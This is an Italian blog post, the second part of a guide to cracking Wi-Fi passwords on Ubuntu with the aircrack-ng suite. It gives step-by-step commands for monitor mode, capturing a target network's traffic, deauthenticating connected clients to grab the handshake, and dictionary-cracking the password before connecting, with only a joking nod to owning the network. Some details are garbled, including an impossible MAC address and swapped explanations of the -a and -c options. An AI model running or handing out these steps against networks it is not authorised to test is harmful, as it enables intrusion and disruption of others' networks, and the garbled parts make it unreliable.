Crea sito

«

»

gen 15

craccare reti wireless con ubuntu (seconda parte)

se avete seguito la prima parte della guida avrete gia installato aircrack-ng sulla vostra distribuzione.

date da terminale:

iwconfig

aircrack-geekubuntu

prendetevi nota della vostra periferica wifi ( da me wlan 0)

sudo airmon-ng start wlan0

iw config

dovrebbe apparirvi adesso mon0 ( o accanto alla vostra periferica wifi ( la mia wlan0 dovrebbe esserci scritto monitor mode enable) voi usate mon0)

sudo airodump-ng mon0

prendetevi nota del bssid (l’indirizzo della rete da craccare dovrebbe essere tipo 00:E87:99:87:O8)

dell essid ( il nome della rete ( nel mio caso casa )

il canale ( sotto ch) da me il 12

date da terminale

sudo airodump-ng mon0 -c 12 –bssid 00:E87:99:87:O8

dove:

  • mon0 è il nome della periferica wifi
  • -c il canale dell’access point
  • –bssid l’indirizzo dell’access point

iniziera a catturare tutti i pacchetti… se la rete è la vostra come spero.. :D basta collegarsi con un altro client ( pc telefono, ….) e catturera subito l’handshake (stretta di mano) è necessaria per trovare la password XD.

se trovate un client collegato alla rete potete dare

sudo aireplay-ng -0100 -a 00:14:BF:6F:54:64 -c 78:92:9C:83:99:48 mon0

dove:

  • -0100 le volte che blocca la connessione facendo scollegare il client
  • -a il client
  • -c l’access point

appena catturate l’handshake potete scaricare un dizionario piu grande basta che cercate su google dizionario aircrack o usate quello di cui gia dispone la suite

date quindi:

sudo aircrack-ng –w [file_dizionario] *.cap

dove:

  • ildizionario è quello che avete scaricato e copaito nella home (estenzione lst)
  • il file cap è quello creato con airodump ed è sempre nella home

trovata la passowrd basta connettervi XD

Lascia un Commento

L'indirizzo email non verrà pubblicato.


*

Puoi usare i seguenti tag HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>